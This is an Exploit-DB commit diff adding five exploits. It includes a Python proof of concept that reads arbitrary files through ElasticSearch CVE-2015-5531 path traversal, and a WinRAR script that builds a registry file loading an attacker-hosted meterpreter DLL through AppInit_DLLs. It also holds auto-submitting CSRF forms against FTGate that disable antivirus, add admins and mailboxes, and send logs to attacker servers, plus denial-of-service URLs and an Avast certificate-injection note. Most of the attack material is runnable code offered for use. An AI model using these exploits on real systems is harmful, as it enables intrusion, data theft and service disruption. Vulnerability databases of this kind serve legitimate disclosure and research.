DB: 2015-10-03

5 new exploits
2015-10-03 05:02:57 +00:00 · 2015-10-03 05:02:57 +00:00 · e21a244644
commit e21a244644
parent 09104c8692
6 changed files with 598 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34665,3 +34665,8 @@ id,file,description,date,author,platform,type,port
 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
 38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0
 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
 38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
 38384,platforms/windows/remote/38384.txt,"Avast Antivirus X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
--- a/platforms/linux/webapps/38383.py
+++ b/platforms/linux/webapps/38383.py
@ -0,0 +1,123 @@
 # elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
 ```
 [crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
 !dSR script for CVE-2015-5531
 127.0.0.1 localhost
 # The following lines are desirable for IPv6 capable hosts
 ::1 ip6-localhost ip6-loopback
 fe00::0 ip6-localnet
 ff00::0 ip6-mcastprefix
 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
 ff02::3 ip6-allhosts
 The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
 In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
 curl http://exploitlab.int:9200/_snapshot/?pretty
 {
  "pwn" : {
    "type" : "fs",
    "settings" : {
      "location" : "dsr"
    }
  },
  "pwnie" : {
    "type" : "fs",
    "settings" : {
      "location" : "dsr/snapshot-ev1l"
    }
  }
 }
 We will use it later to access through path traversal url:
 trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
 The file content it's represented as an array of ints, that needs to be translated into human readable:
 crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
 !dSR script for CVE-2015-5531
 {u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
 [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
 There is also a path disclosure that could help exploiting in some scenarios:
 crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
 !dSR script for CVE-2015-5531
 {"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
 ```
 #!/usr/bin/env python
 # PoC for CVE-2015-5531 - Reported by Benjamin Smith
 # Affects ElasticSearch 1.6.0 and prior
 # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
 # Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
 # Tested on default Linux (.deb) install || requires path.repo: to be set on config file
 import urllib, urllib2, json, sys, re
 print "!dSR script for CVE-2015-5531\n"
 if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()
 host = sys.argv[1]
 fpath = urllib.quote(sys.argv[2], safe='')
 port = 9200
 trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..' 
 reponame = 'pwn'
 baseurl = "http://%s:%s/_snapshot/" % (host, port)
 xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)
 def createSnapdirs():
 	try:
 		url = "%s/%s" % (baseurl, reponame)
 		request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
 		request.get_method = lambda: 'POST'
 		urllib2.urlopen(request)
        	url = "%s/%sie" % (baseurl, reponame)
 	        request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
 	        request.get_method = lambda: 'POST'
 	        urllib2.urlopen(request)
 	except urllib2.HTTPError, e:
                data = json.load(e)
 		print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
 		print str(data['error'])
 		sys.exit()
 def grabFile(xplurl):
 	try:
 		urllib2.urlopen(xplurl)
 	except urllib2.HTTPError, e:
 		data = json.load(e)
 		extrdata = re.findall(r'\d+', str(data['error']))
 		decoder = bytearray()
 		for i in extrdata[+2:]:
 			decoder.append(int(i))
 		print decoder
 def main():
 	createSnapdirs()
 	grabFile(xplurl)
 if __name__ == "__main__":
    main()
--- a/platforms/windows/local/38381.py
+++ b/platforms/windows/local/38381.py
@ -0,0 +1,54 @@
 #!/usr/bin/python -w
 # Title : WinRar Settings Import Command Execution
 # Date : 02/10/2015
 # Author : R-73eN
 # Tested on : Windows 7 Ultimate
 # Vulnerable Versions : Winrar < 5.30 beta 4
 # The vulnerability exists in the "Import Settings From File" function.
 # Since Settings file of Winrar are saved as a registry file and WinRar executes
 # it in an automatic way without checking if it is writing to the Registry keys 
 # used by winrar, we can create a specially crafted settings file and we can 
 # overwrite registry keys.
 # Since we have access to registry there are various ways we could use this to 
 # get code execution such as defining "RUN" keys or creating new services etc 
 # However the best way to get code execution is using AppInit DLLs
 # AppInit DLLs are DLLs that are loaded into any process when it starts. 
 # In this case, we can specify a meterpreter DLL payload using a UNC path on
 # an SMB server we control and then next time a new process starts we will 
 # get a shell.
 # Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
 #
 # Triggering the vulnerability
 # 1) Run this python script.
 # 2) Open WinRar
 # 3) Click Options
 # 4) Click Import/Export
 # 5) Import Settings from file
 # 6) Select the Specially crafted Settings.reg file
 #
 # Disclosure Timeline:
 # 01/10/2015 - Vendor Contacted POC provided
 # 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on  to verify
 # presence of [HKEY_CURRENT_USER\Software\WinRAR] or
 # [HKEY_CURRENT_USER\Software\WinRAR\
 #
 #
 banner = ""
 banner +="  ___        __        ____                 _    _  \n" 
 banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
 banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
 banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
 banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
 print banner
 print "[+] WinRar Settings Import Command Execution [+]\n"
 dll = raw_input("[+] Enter dll location (smb) : ")
 dll = dll.replace("\\","\\\\")
 print "[+] Writing Contet To Settings.reg [+]"
 evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
 print evil
 f = open("Settings.reg","w")
 f.write(evil)
 f.close()
 print "[+] Settings.reg created successfully [+]"
 print "\n https://www.infogen.al/ \n"
--- a/platforms/windows/remote/38384.txt
+++ b/platforms/windows/remote/38384.txt
@ -0,0 +1,12 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=546
 Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
 To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
 $ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
 Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38384.zip
--- a/platforms/windows/webapps/38379.txt
+++ b/platforms/windows/webapps/38379.txt
@ -0,0 +1,223 @@
 [+] Credits: hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
 Vendor:
 ================================
 www.ftgate.com
 Product:
 ========================================
 FTGate 2009 SR3 May 13 2010 Build 6.4.00
 Vulnerability Type:
 =================================
 Cross site request forgery (CSRF)
 CVE Reference:
 ==============
 N/A
 Vulnerability Details:
 =====================
 Multiple CSRF vectors exist within FTGate 2009 that allow us to add
 arbitrary remote domains,
 disable antivirus scanning for various Email file attachment types, and
 finally change settings
 to have archived server logs sent to our remote attacker controlled server
 for safe keeping.
 Exploit code(s):
 ===============
 CSRF(s):
 <!DOCTYPE>
 <html>
 <body onLoad="invertedcross()">
 <script>
 function invertedcross(){
 var e=document.getElementById('PUNKSNOTDEAD')
 e.submit()
 }
 </script>
 1) add arbitrary domains:
 -------------------------
 <form id="PUNKSNOTDEAD" action="
 http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
 method="post">
 <input type="text" name="dname" value="hyp3rlinx.com" />
 <input type="text" name="dtype" value="4" />
 <input type="text" name="fname" value="*" />
 <input type="text" name="action" value="domadd" />
 <input type="text" name="domain" value="" />
 <input type="text" name="newdomain" value="" />
 </form>
 2) sends archived logs to arbitrary remote server:
 --------------------------------------------------
 <form id="PUNKSNOTDEAD" action="
 http://localhost:8089/webadmin/config/archive.fts?action=save"
 method="post">
 <input type="text" name="enable" value="on" />
 <input type="text" name="path"
 value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
 <input type="text" name="duration" value="0" />
 <input type="text" name="external" value="on" />
 <input type="text" name="extarcserver" value="6.6.6.0" />
 </form>
 3) disable virus scan for .jar or .exe files etc:
 -------------------------------------------------
 Options to control handling of virus scanning for email attachments Virus
 Scanning Mode
 Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
 <form id="PUNKSNOTDEAD" action="
 http://localhost:8089/webadmin/filters/virus.fts" method="post">
 <input type="text" name="action" value="add" />
 <input type="text" name="mode" value="0" />
 <input type="text" name="extension" value="dll" />
 </form>
 </body>
 </html>
 Disclosure Timeline:
 =========================================================
 Vendor Notification: September 29, 2015
 October 1, 2015 : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 =========================================================
 High
 Description:
 ==========================================================
 Request Method(s):              [+]  POST
 Vulnerable Product:             [+]  FTGate 2009 SR3 May 13 2010 Build
 6.4.00
 Vulnerable Parameter(s):        [+]  domadd, extarcserver & mode
 ####################################################
 [+] Credits: hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
 Vendor:
 ================================
 www.ftgate.com
 Product:
 ================================
 FTGate 2009 SR3 May 13 2010 Build 6.4.000
 Vulnerability Type:
 =======================
 Denial of service (DOS)
 CVE Reference:
 ==============
 N/A
 Vulnerability Details:
 =====================
 Multiple denial of service oppurtunities reside within FTGate 2009 that
 allow us to disrupt and shut down
 various FTGate services via GET requests by luring victimz to our website
 or get them to click our malicious linxs.
 Exploit code(s):
 ===============
 DOS:
 1) shutdown solight web mail interface on port 80
 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
 2) shutdown Monitor server port 8081
 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
 3) shutdown FTGate connector server port 8090 listens on address 'Any'
 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
 4) shutdown IMAP server port 143 listening on 'Any'
 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
 Disclosure Timeline:
 =========================================================
 Vendor Notification: September 29, 2015
 October 1, 2015 : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 =========================================================
 Medium
 Description:
 ==========================================================
 Request Method(s):              [+]  GET
 Vulnerable Product:             [+]  FTGate 2009 SR3 May 13 2010 Build
 6.4.000
 Vulnerable Parameter(s):        [+]  action, id
 ===========================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 by hyp3rlinx
--- a/platforms/windows/webapps/38380.txt
+++ b/platforms/windows/webapps/38380.txt
@ -0,0 +1,181 @@
 [+] Credits: hyp3rlinx
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
 Vendor:
 ================================
 www.ftgate.com
 www.ftgate.com/ftgate-update-7-0-300
 Product:
 ================================
 FTGate v7
 Vulnerability Type:
 =================================
 Cross site request forgery (CSRF)
 CVE Reference:
 ==============
 N/A
 Vulnerability Details:
 =====================
 Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
 www.ftgate.com/ftgate-update-7-0-300
 1) add arbitrary domains
 2) enable arbitrary remote archiving of logs
 3) whitelist arbitrary email addresses
 4) add arbitrary mailbox & disable antivirus,
 5) remove email attachment blocking for filez.
 Exploit code(s):
 ===============
 <!DOCTYPE>
 <html>
 <body onLoad="doit()">
 <script>
 function doit(){
 var e=document.getElementById('HELL')
 e.submit()
 }
 </script>
 1) add arbitrary remote domain:
 <form id='HELL' action="
 http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
 method="post">
 <input type="text" name="name" value="abysmalgodz" />
 <input type="text" name="type" value="1" />
 </form>
 2) enable arbitrary remote archive:
 <form id='HELL' action="
 http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
 method="post">
 <input type="text" name="action" value="save" />
 <input type="text" name="enable" value="on" />
 <input type="text" name="duration" value="0" />
 <input type="text" name="external" value="on" />
 <input type="text" name="extarcserver" value="0.6.6.6" />
 </form>
 disable Antivirus for .exe files: also, has a persistent XSS inject but our
 payload gets truncated at 5 chars,
 but can corrupt the loading of valid XML returned from database to the WEB
 UI.
 e.g.
 HTTP response after attack outputs corrupted XML generating errors.
 <cell>exe</cell>
 <cell/>
 <cell><scri</cell>
 <cell/>
 </row>
 <row id='id_"/><s'>
 http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
 <form id='HELL' action="
 http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
 method="post">
 <input type="text" name="mode" value="on" />
 <input type="text" name="selftest" value="0ff" />
 <input type="text" name="extGrid_id_exe_0" value="1" />
 </form>
 add arbitrary Admins:
 http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
 whitelist arbitrary email addresses:
 Messages that originate from these email addresses are not filtered by the
 Word or Phrase filters.
 http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
 <!--remove email attachment blocking for exe, hta & html filez -->
 http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
 when access the above URL it returns XML with all file extensions blocked
 on incoming email, we now know ID in database.
 so to remove blocking of .cmd we select '11'
 http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
 or remove blocking of multiple file types in one shot
 http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
 add arbitrary mailbox:
 <form id='HELL' action="
 http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
 method="post">
 <input type="text" name="name" value="punksnotdead" />
 <input type="text" name="type" value="0" />
 <input type="text" name="cn" value="punksnotdead" />
 <input type="text" name="password" value="punksnotdead" />
 </form>
 </body>
 </html>
 Disclosure Timeline:
 ========================================
 Vendor Notification: September 29, 2015
 October 1, 2015 : Public Disclosure
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ================
 High
 Description:
 ==========================================================
 Request Method(s):              [+]  GET
 Vulnerable Product:             [+]  FTGate v7
 Vulnerable Parameter(s):        [+]  type, id, mode, add, extarcserver
 ===========================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 by hyp3rlinx